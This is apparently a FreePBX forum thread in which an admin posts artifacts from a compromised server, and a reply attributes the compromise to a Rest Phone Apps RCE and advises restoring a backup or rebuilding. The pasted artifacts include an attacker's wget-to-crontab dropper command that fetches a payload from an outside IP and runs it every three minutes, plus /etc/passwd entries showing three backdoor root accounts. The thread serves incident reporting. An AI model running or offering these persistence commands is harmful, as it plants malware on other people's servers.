wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull;crontab -r;{echo “/3 * * * * chmod +x /var/lib/asterisk/bin/devnull;/var/lib/asterisk/bin/devnull";} | crontab -; rm -rf /var/spool/asterisk/tmp/k rm -rf /var/www/html/admin/modules/freepbx_ha/license.php
rm -rf /var/www/html/admin/modules/freepbx_ha/license.php
rm -rf /var/www/html/admin/modules/freepbx_ha/license.php
total 340
dr-xr-x—. 5 root root 4096 Nov 29 12:39 .
dr-xr-xr-x. 18 root root 4096 May 25 2018 …
-rw-------. 1 root root 12817 Aug 6 2017 anaconda-ks.cfg
-rw------- 1 root root 3119 Nov 30 17:17 .asterisk_history
-rw------- 1 root root 19497 Jan 3 16:27 .bash_history
-rw-r–r–. 1 root root 18 Dec 29 2013 .bash_logout
-rw-r–r–. 1 root root 358 Dec 24 05:19 .bash_profile
-rw-r–r–. 1 root root 358 Dec 24 05:19 .bashrc
drwx------ 4 root root 35 Sep 30 2020 .config
-rw-r–r–. 1 root root 100 Dec 29 2013 .cshrc
-rw-r–r-- 1 root root 249497 Nov 29 13:18 freepbx16_upgrade.log
-rw-r–r–. 1 root root 1392 Aug 6 2017 ks-post-chroot.log
-rw-r–r–. 1 root root 8319 Aug 6 2017 ks-post.log
-rw------- 1 root root 1498 Oct 1 2020 .mysql_history
drwxr----- 3 root root 18 Aug 6 2017 .pki
-rw-------. 1 root radiusd 1024 Aug 6 2017 .rnd
drwxr-xr-x 2 root root 28 Apr 27 2020 .ssh
-rw-r–r–. 1 root root 129 Dec 29 2013 .tcshrc
-rw------- 1 root root 3825 Oct 1 2020 .viminfo
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
asterisk:x:995:995::/home/asterisk:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
systemd-bus-proxy:x:994:992:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:993:991:User for polkitd:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
openvpn:x:992:990:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
radiusd:x:95:95:radiusd user:/var/lib/radiusd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin mongodb:x:184:987:MongoDB Database Server:/var/lib/mongodb:/sbin/nologin
chrony:x:991:986::/var/lib/chrony:/sbin/nologin
redis:x:990:985:Redis Database Server:/var/lib/redis:/sbin/nologin
unbound:x:989:984:Unbound DNS resolver:/etc/unbound:/sbin/nologin
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
total 4
4 drwxr-xr-x. 12 asterisk asterisk 4096 Nov 29 13:00 asterisk
0 drwx------ 2 root root 59 Dec 23 18:11 sugarmaint
0 drwx------ 2 root root 59 Dec 23 01:59 supermaint
0 drwx------ 2 root root 59 Dec 23 01:59 supports
total 80
drwxrwxr-x 9 asterisk asterisk 4096 Jan 9 19:26 .
drwxrwxr-x. 120 asterisk asterisk 4096 Jan 3 12:22 …
-rw-rw-r-- 1 asterisk asterisk 803 May 8 2017 ajax.php
drwxrwxr-x 4 asterisk asterisk 25 May 8 2017 assets
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 files
-rw-rw-r-- 1 asterisk asterisk 1366 May 8 2017 Freepbx_ha.class.php
drwxrwxr-x 3 asterisk asterisk 4096 May 8 2017 functions.inc
-rw-rw-r-- 1 asterisk asterisk 1062 May 8 2017 functions.inc.php
drwxrwxr-x 2 asterisk asterisk 27 May 8 2017 hooks
drwxrwxr-x 4 asterisk asterisk 51 May 8 2017 i18n
drwxrwxr-x 2 asterisk asterisk 71 May 8 2017 images
-rw-rw-r-- 1 asterisk asterisk 325 May 8 2017 install.php
-rw-rw-r-- 1 asterisk asterisk 11436 May 8 2017 LICENSE
-rw-rw-r-- 1 asterisk asterisk 7975 May 8 2017 module.sig
-rw-rw-r-- 1 asterisk asterisk 2299 May 8 2017 module.xml
-rw-rw-r-- 1 asterisk asterisk 885 May 8 2017 moveapache.php
-rw-rw-r-- 1 asterisk asterisk 3079 May 8 2017 page.freepbx_ha.php
-rw-rw-r-- 1 asterisk asterisk 3692 May 8 2017 upgradecluster.sh
-rw-rw-r-- 1 asterisk asterisk 121 May 8 2017 Upgrade.repo
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 views
total 84
drwxrwxr-x 9 asterisk asterisk 4096 Jan 9 19:26 .
drwxrwxr-x. 120 asterisk asterisk 4096 Jan 3 12:22 …
-rw-rw-r-- 1 asterisk asterisk 803 May 8 2017 ajax.php
drwxrwxr-x 4 asterisk asterisk 25 May 8 2017 assets
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 files
-rw-rw-r-- 1 asterisk asterisk 1366 May 8 2017 Freepbx_ha.class.php
drwxrwxr-x 3 asterisk asterisk 4096 May 8 2017 functions.inc
-rw-rw-r-- 1 asterisk asterisk 1062 May 8 2017 functions.inc.php
drwxrwxr-x 2 asterisk asterisk 27 May 8 2017 hooks
drwxrwxr-x 4 asterisk asterisk 51 May 8 2017 i18n
drwxrwxr-x 2 asterisk asterisk 71 May 8 2017 images
-rw-rw-r-- 1 asterisk asterisk 325 May 8 2017 install.php
-rw-rw-r-- 1 asterisk asterisk 11436 May 8 2017 LICENSE
-rw-r–r-- 1 root root 598 Jan 9 19:26 license.php
-rw-rw-r-- 1 asterisk asterisk 7975 May 8 2017 module.sig
-rw-rw-r-- 1 asterisk asterisk 2299 May 8 2017 module.xml
-rw-rw-r-- 1 asterisk asterisk 885 May 8 2017 moveapache.php
-rw-rw-r-- 1 asterisk asterisk 3079 May 8 2017 page.freepbx_ha.php
-rw-rw-r-- 1 asterisk asterisk 3692 May 8 2017 upgradecluster.sh
-rw-rw-r-- 1 asterisk asterisk 121 May 8 2017 Upgrade.repo
drwxrwxr-x 2 asterisk asterisk 4096 May 8 2017 views
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
asterisk:x:995:995::/home/asterisk:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
systemd-bus-proxy:x:994:992:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:993:991:User for polkitd:/:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
openvpn:x:992:990:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
radiusd:x:95:95:radiusd user:/var/lib/radiusd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin mongodb:x:184:987:MongoDB Database Server:/var/lib/mongodb:/sbin/nologin
chrony:x:991:986::/var/lib/chrony:/sbin/nologin
redis:x:990:985:Redis Database Server:/var/lib/redis:/sbin/nologin
unbound:x:989:984:Unbound DNS resolver:/etc/unbound:/sbin/nologin
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
total 4
4 drwxr-xr-x. 12 asterisk asterisk 4096 Nov 29 13:00 asterisk
0 drwx------ 2 root root 59 Dec 23 18:11 sugarmaint
0 drwx------ 2 root root 59 Dec 23 01:59 supermaint
0 drwx------ 2 root root 59 Dec 23 01:59 supports
wget http://1.1.1.1/k.php -O /var/lib/asterisk/bin/devnull;crontab -r;{echo "
/3 * * * * chmod +x /var/lib/asterisk/bin/devnull;/var/lib/asterisk/bin/devnull”;} | crontab -; rm -rf /var/spool/asterisk/tmp/k rm -rf /var/www/html/admin/modules/freepbx_ha/license.php
rm -rf /var/www/html/admin/modules/freepbx_ha/license.php
rm -rf /var/www/html/admin/modules/freepbx_ha/license.php

Your server has been compromised by malware, most likely related to this: SECURITY ISSUE - Potential Rest Phone Apps RCE

Firstly thank you for the response even though I of course am not so happy with it but don’t shoot the messenger I guess fully applies.

Okay, how can I get it clean other than starting from scratch (which I don’t really want to do but of course everything is possible).

Restore a backup from before the compromise or start from scratch are your only reasonable choices fixing this one would take a lot more ‘knowledge’ than most folks have.

This topic was automatically closed 31 days after the last reply. New replies are no longer allowed.